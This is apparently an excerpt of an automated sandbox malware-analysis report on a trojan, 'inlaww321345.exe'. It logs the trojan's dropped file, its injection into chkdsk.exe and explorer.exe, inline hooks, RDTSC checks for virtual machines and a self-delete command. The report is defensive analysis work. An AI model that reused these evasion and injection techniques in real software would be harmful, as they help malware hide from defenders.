          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 0166B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 003B2400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A35A NtCreateFile,2_2_0041A35A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A45A NtReadFile,2_2_0041A45A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A492 NtClose,2_2_0041A492
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_016A9910
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A99A0 NtCreateSection,LdrInitializeThunk,2_2_016A99A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_016A9860
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9840 NtDelayExecution,LdrInitializeThunk,2_2_016A9840
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_016A98F0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A50 NtCreateFile,LdrInitializeThunk,2_2_016A9A50
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A20 NtResumeThread,LdrInitializeThunk,2_2_016A9A20
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_016A9A00
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9540 NtReadFile,LdrInitializeThunk,2_2_016A9540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A95D0 NtClose,LdrInitializeThunk,2_2_016A95D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9710 NtQueryInformationToken,LdrInitializeThunk,2_2_016A9710
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_016A97A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9780 NtMapViewOfSection,LdrInitializeThunk,2_2_016A9780
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_016A9660
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_016A96E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9950 NtQueueApcThread,2_2_016A9950
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A99D0 NtCreateProcessEx,2_2_016A99D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AB040 NtSuspendThread,2_2_016AB040
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9820 NtEnumerateKey,2_2_016A9820
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A98A0 NtWriteVirtualMemory,2_2_016A98A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9B00 NtSetValueKey,2_2_016A9B00
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA3B0 NtGetContextThread,2_2_016AA3B0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A10 NtQuerySection,2_2_016A9A10
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9A80 NtOpenDirectoryObject,2_2_016A9A80
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9560 NtWriteFile,2_2_016A9560
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9520 NtWaitForSingleObject,2_2_016A9520
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AAD30 NtSetContextThread,2_2_016AAD30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A95F0 NtQueryInformationFile,2_2_016A95F0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9760 NtOpenProcess,2_2_016A9760
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA770 NtOpenThread,2_2_016AA770
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9770 NtSetInformationFile,2_2_016A9770
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9730 NtQueryVirtualMemory,2_2_016A9730
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016AA710 NtOpenProcessToken,2_2_016AA710
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9FE0 NtCreateMutant,2_2_016A9FE0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9670 NtQueryInformationProcess,2_2_016A9670
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9650 NtQueryValueKey,2_2_016A9650
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9610 NtEnumerateValueKey,2_2_016A9610
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A96D0 NtCreateKey,2_2_016A96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9540 NtReadFile,LdrInitializeThunk,16_2_053F9540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95D0 NtClose,LdrInitializeThunk,16_2_053F95D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9710 NtQueryInformationToken,LdrInitializeThunk,16_2_053F9710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9780 NtMapViewOfSection,LdrInitializeThunk,16_2_053F9780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9FE0 NtCreateMutant,LdrInitializeThunk,16_2_053F9FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_053F9660
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9650 NtQueryValueKey,LdrInitializeThunk,16_2_053F9650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_053F96E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96D0 NtCreateKey,LdrInitializeThunk,16_2_053F96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_053F9910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99A0 NtCreateSection,LdrInitializeThunk,16_2_053F99A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_053F9860
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9840 NtDelayExecution,LdrInitializeThunk,16_2_053F9840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A50 NtCreateFile,LdrInitializeThunk,16_2_053F9A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FAD30 NtSetContextThread,16_2_053FAD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9520 NtWaitForSingleObject,16_2_053F9520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9560 NtWriteFile,16_2_053F9560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95F0 NtQueryInformationFile,16_2_053F95F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9730 NtQueryVirtualMemory,16_2_053F9730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA710 NtOpenProcessToken,16_2_053FA710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA770 NtOpenThread,16_2_053FA770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9770 NtSetInformationFile,16_2_053F9770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9760 NtOpenProcess,16_2_053F9760
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F97A0 NtUnmapViewOfSection,16_2_053F97A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9610 NtEnumerateValueKey,16_2_053F9610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9670 NtQueryInformationProcess,16_2_053F9670
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9950 NtQueueApcThread,16_2_053F9950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99D0 NtCreateProcessEx,16_2_053F99D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9820 NtEnumerateKey,16_2_053F9820
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FB040 NtSuspendThread,16_2_053FB040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98A0 NtWriteVirtualMemory,16_2_053F98A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98F0 NtReadVirtualMemory,16_2_053F98F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9B00 NtSetValueKey,16_2_053F9B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA3B0 NtGetContextThread,16_2_053FA3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A20 NtResumeThread,16_2_053F9A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A10 NtQuerySection,16_2_053F9A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A00 NtProtectVirtualMemory,16_2_053F9A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A80 NtOpenDirectoryObject,16_2_053F9A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A360 NtCreateFile,16_2_0098A360
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A490 NtClose,16_2_0098A490
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A410 NtReadFile,16_2_0098A410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A540 NtAllocateVirtualMemory,16_2_0098A540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A35A NtCreateFile,16_2_0098A35A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A492 NtClose,16_2_0098A492
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A45A NtReadFile,16_2_0098A45A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A53A NtAllocateVirtualMemory,16_2_0098A53A
          Source: inlaww321345.exeVirustotal: Detection: 53%
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\user\Desktop\inlaww321345.exeJump to behavior
          Source: inlaww321345.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inlaww321345.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\inlaww321345.exe "C:\Users\user\Desktop\inlaww321345.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxskJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxskJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"Jump to behavior
          Source: C:\Users\user\Desktop\inlaww321345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD94A.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/2
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;1_2_003B45B0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;2_2_003B45B0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B2445 push ecx; ret 1_2_003B2458
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B2445 push ecx; ret 2_2_003B2458
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_004168D5 push ebp; ret 2_2_004168D8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041E9A8 push dword ptr [25B3BB99h]; ret 2_2_0041E9CB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00416CD3 push esi; ret 2_2_00416CDB
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00417CF5 pushfd ; iretd 2_2_00417CF6
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016BD0D1 push ecx; ret 2_2_016BD0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0540D0D1 push ecx; ret 16_2_0540D0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_009868D5 push ebp; ret 16_2_009868D8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098E9A8 push dword ptr [25B3BB99h]; ret 16_2_0098E9CB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D4B5 push eax; ret 16_2_0098D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00986CD3 push esi; ret 16_2_00986CDB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00987CF5 pushfd ; iretd 16_2_00987CF6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D50B push eax; ret 16_2_0098D572
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D502 push eax; ret 16_2_0098D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D56C push eax; ret 16_2_0098D572
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B1890
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979B7E second address: 0000000000979B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 4232Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6486
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI coverage: 4.1 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.0 %
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\inlaww321345.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI call chain: ExitProcess graph end nodegraph_1-6488
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000005.00000000.295963251.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
